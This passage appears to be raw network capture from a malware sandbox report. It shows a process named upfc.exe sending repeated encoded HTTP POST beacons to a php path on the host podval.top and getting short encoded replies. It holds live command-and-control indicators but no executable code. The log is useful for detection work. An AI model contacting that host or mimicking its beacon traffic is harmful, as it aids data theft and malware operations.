                                                    Data Ascii: _T_T[]RXXVUQPPYQUQ^YQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1(3?X$ '_>9 >9X-&'6'#S/+[ +/,"['$Y
                                                    Jul 3, 2024 16:43:39.571706057 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:39.917397976 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEc%2B4nqZKtsnwTL0Dgji9Nl3tQqQfbuJX2%2BJ6mJ13ClWebncfCGhxy5Xj%2BnMkzB79CIFqW5NSkJD3bdF5Ppr3McK1m%2FEgAKZ6ovHBk0uXS7yyIQGp1rdBRrexPoh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a62c0e184314-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    119192.168.2.1049837188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:40.001620054 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    120192.168.2.1049838188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:40.048408985 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:40.400813103 CEST1060OUTData Raw: 5f 57 5a 5f 5e 5a 52 5c 58 56 55 51 50 5b 59 5b 55 5d 5e 59 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ_^ZR\XVUQP[Y[U]^YQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!% @0'%0)1 =*-.[353(/'X4(,,"['$Y -
                                                    Jul 3, 2024 16:43:40.493532896 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:40.699007988 CEST575INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SSM4RrAuR6OvMpM53l9vkfDfK%2FVfCKPcRf%2Fw0ZSwAQdHcMy8EJclfvQbynLYU2%2BquiAv2gYE0iquUpDMmxCG83FFThg4kw1vGcSaH7dds8UrxPHioyabgFVIDg22"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a631ccf57271-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:40.785795927 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    121192.168.2.1049839188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:40.928491116 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:41.276802063 CEST1060OUTData Raw: 5f 54 5f 54 5b 56 52 5a 58 56 55 51 50 5f 59 54 55 51 5e 5f 51 5d 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_T[VRZXVUQP_YTUQ^_Q]S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2?$)4';Z)>7:.'50#-.#_41#-,"['$Y =
                                                    Jul 3, 2024 16:43:41.388411045 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:41.735140085 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKRWoqrxGeSCB117MvU6oFAW1opoSEXFbu5POZUMQYHopr%2BTEM9MnT8RTUWHQUGr63TJXoxR5XsopxkuvCQEszAD7sPUaConfEiTfwscHtIXCYOPS5a%2Bmx%2BMhG85"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6376e0d42af-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    122192.168.2.1049840188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:41.872080088 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:42.231978893 CEST1060OUTData Raw: 5a 55 5f 5e 5b 5d 57 58 58 56 55 51 50 5a 59 56 55 51 5e 58 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_^[]WXXVUQPZYVUQ^XQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%:0A30)4.9\:&'%=Y0(;?_ 4;"['$Y )
                                                    Jul 3, 2024 16:43:42.320619106 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:42.530328989 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrfNYlyRuqgsuUeTSnRzD%2BMvJg6CPKHWWirLKkIU9aORE95hMC3oySz4ZyC4ckBCvjhE6%2BXfUGNoEJs40%2BA5ctCRs67HeMv8chUX453svAJqfkvCXyBx5cwHQY3u"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a63d3ba343c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    123192.168.2.1049841188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:42.660562038 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:43.010312080 CEST1060OUTData Raw: 5f 52 5a 5c 5b 5a 57 5d 58 56 55 51 50 58 59 57 55 5f 5e 58 51 59 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _RZ\[ZW]XVUQPXYWU_^XQYSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[19/'83 *4-1[.*'6$<,>(#/"['$Y !
                                                    Jul 3, 2024 16:43:43.207057953 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:43.415102005 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zdr1B55wDQAZi9v2G%2FmZ0zfqlyo14iCnHwdXoAgbmZxIwVZ45BYznxYCg2H%2FRD%2Bq4sdpzG1%2FfBUC8I3%2BMQqcY003slfs3T0OAWWipsSOIs69PyIEer8203wIfzDH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a642cce272c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    124192.168.2.1049842188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:43.551006079 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:43.901467085 CEST1060OUTData Raw: 5f 50 5f 58 5e 5a 57 50 58 56 55 51 50 58 59 56 55 5b 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_X^ZWPXVUQPXYVU[^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&)?'98'7(>.!>%:3)$+U/X T7/"['$Y !
                                                    Jul 3, 2024 16:43:44.006256104 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:44.348320007 CEST573INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oRPBxhlug0O%2FHL067Cw3x5Z6ohu3AeKZMnTG26xj0ybqNZ0Jsq30MjJdHcDpDvYpKq4awR15osyZ0b%2Bo9Th07ZN8iYsnf17MzlH3WtlESfO4NcXhXSEe5r5YFrhc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a647ce387cb1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:44.447985888 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    125192.168.2.1049843188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:44.577975988 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:44.932097912 CEST1056OUTData Raw: 5a 52 5f 5a 5b 5b 57 5c 58 56 55 51 50 59 59 55 55 5d 5e 5e 51 5a 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_Z[[W\XVUQPYYUU]^^QZSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\19A0'V *-64=>.$'7,=8#2 /"['$Y =


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    126192.168.2.1049844188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:45.080379009 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1736
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:45.432209969 CEST1736OUTData Raw: 5f 5a 5a 5e 5b 59 57 5d 58 56 55 51 50 59 59 50 55 51 5e 55 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ^[YW]XVUQPYYPUQ^UQ_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2'':#%#(=-2#..-36>%#$/.Y72$8,"['$Y )
                                                    Jul 3, 2024 16:43:45.574035883 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.915699959 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54H10diVrO1Il%2BVqz7cHXcoaNqK4sOfXTGpycmo%2B%2BiCP8iqLVwETX4mWJoxOSBPnvJShwd0RuD2XJGN6d7MZotld5ObH7xmQC5e8VnMUvEtedC886jMdMjoMAKCu"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6518e8f0cae-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 25 14 35 10 26 22 0d 50 3a 5b 38 0a 28 3e 24 5e 3b 07 35 5b 3c 24 04 05 2e 3d 2e 18 20 04 25 07 2b 3c 20 59 26 56 2f 0d 35 31 20 5b 04 1c 20 00 2b 39 36 01 29 2b 2c 0c 26 05 22 1b 30 09 17 10 33 02 32 57 24 5e 3c 00 3d 2b 2a 09 24 54 33 5a 3d 06 2d 06 3c 09 04 59 36 0e 21 54 02 13 22 50 33 13 3d 52 37 0e 0a 0a 25 33 22 01 24 27 34 0c 33 0a 2e 54 2a 0d 29 0c 30 32 3c 5a 21 3f 02 0f 27 16 22 5f 27 2d 3a 00 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%5&"P:[8(>$^;5[<$.=. %+< Y&V/51 [ +96)+,&"032W$^<=+*$T3Z=-<Y6!T"P3=R7%3"$'43.T*)02<Z!?'"_'-:"#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    127192.168.2.1049845188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:45.202579021 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:45.557127953 CEST1060OUTData Raw: 5a 52 5f 55 5b 56 57 59 58 56 55 51 50 5d 59 54 55 5c 5e 58 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_U[VWYXVUQP]YTU\^XQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z':,C0?\3V+_>>1S >-X9X$"3(/.7"(Z;"['$Y 5
                                                    Jul 3, 2024 16:43:45.677907944 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.882349014 CEST588INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2BJPXvMw8YYRJA4%2Bd5vht2WzSLaABX7kfYl8LeNb6ZkY%2FreZIOFCKR%2F5yJX%2BRyM%2FwcVK55uCIdyNaLDEUwSaJvZv35wO%2BQiQ7o2FxVIUvTtQhfYvJB4Rw0TuHaQ3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6522f327298-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    128192.168.2.1049846188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:46.015672922 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:46.370336056 CEST1060OUTData Raw: 5f 50 5a 5f 5b 5f 52 5c 58 56 55 51 50 58 59 57 55 59 5e 5a 51 5a 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _PZ_[_R\XVUQPXYWUY^ZQZSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1_,&9#$#)=9!=.X=&5>30,8.X "/,"['$Y !
                                                    Jul 3, 2024 16:43:46.464138031 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:46.811393976 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lezGgIUNH0vRJaP03s0%2FZi%2Fpv7RMQB8NqtkVraiOuVplv5U59%2B0kGDkdtcLEO5K6H2USV6txCUM%2FiaIZpP9PKrgzH8Od1tIKmeRJ7EF7Ylj0CrqoX2THbk3So0E7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65719e1c463-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    129192.168.2.1049847188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:46.934653997 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:47.306325912 CEST1060OUTData Raw: 5a 57 5a 59 5b 59 52 5b 58 56 55 51 50 5e 59 52 55 51 5e 5b 51 55 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZWZY[YR[XVUQP^YRUQ^[QUSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X&E08'0#_).: [%Z:X!X'&>'#3->#!?;<"['$Y
                                                    Jul 3, 2024 16:43:47.408875942 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:47.613430977 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:47 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0QZ%2B2s4wmpN5oMh1rhNoL6XRBYGyZYB1YVFcQYPxfzr2WNaY7R8Jmd6T6H5n%2F9bAgPC8VPe4UtxllhuGs9jk6xTjo4%2BZJJXl57x8rs7%2B2Z%2BJFXHJnMfLtsO3dOr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65cfb985e68-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    130192.168.2.1049848188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:47.751213074 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
